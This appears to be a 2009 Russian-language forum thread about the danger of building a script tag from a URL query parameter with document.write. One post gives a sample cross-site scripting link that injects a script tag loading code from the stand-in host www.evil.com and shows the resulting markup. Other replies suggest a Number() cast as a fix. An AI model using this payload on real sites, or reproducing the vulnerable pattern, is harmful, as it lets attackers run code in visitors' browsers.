Форум

x-yuri · #21 (**permalink**) 24.01.2009, 03:25

а, ну единственная опасность, которую я вижу в таком случае, что кто-то загрузит на сервер свой скрипт (дырявая загрузка файлов на сервер)

ZoNT · #22 (**permalink**) 26.01.2009, 12:46

вот ссылка для клика:
www.name.ru/index.htm?1.js"></script><script src="http://www.evil.com/script

вот что получится в скрипте:

url = '1.js"></script><script src="http://www.evil.com/script';
document.write('<script TYPE="text/javascript" src="www.name.ru/'+url+'.js"><\/script>')

Итого в документ запишется:

<script TYPE="text/javascript" src="www.name.ru/1.js"></script><script src="http://www.evil.com/script.js"></script>'

x-yuri · #23 (**permalink**) 26.01.2009, 12:50

однако, прям javascript-injection O_o

ZoNT · #24 (**permalink**) 26.01.2009, 12:53

да блин, обычный css на фигово разработанных сайтах...
Я же советую человеку не показывать своё невежество и не делать так. зачем городить такую лабуду? Чтобы потом писать 20 строк кода для проверки передаваемого параметра на безопасность?

x-yuri · #25 (**permalink**) 26.01.2009, 12:56

это

document.write('<script TYPE="text/javascript" src="'+Number(url)+'.js"><\/script>')

на 20 строк не похоже

ZoNT · #26 (**permalink**) 26.01.2009, 13:02

Это поменьше, я согласен. Но всё равно, такой поход (параметр в строке) говорит о том, что на сайте можно немного поискать и найти ещё пару-тройку ошибок...

x-yuri · #27 (**permalink**) 26.01.2009, 13:21

ну скажем так, автору пока опасно применять такой подход

Форум

Справочник

Discord чат

Курсы javascript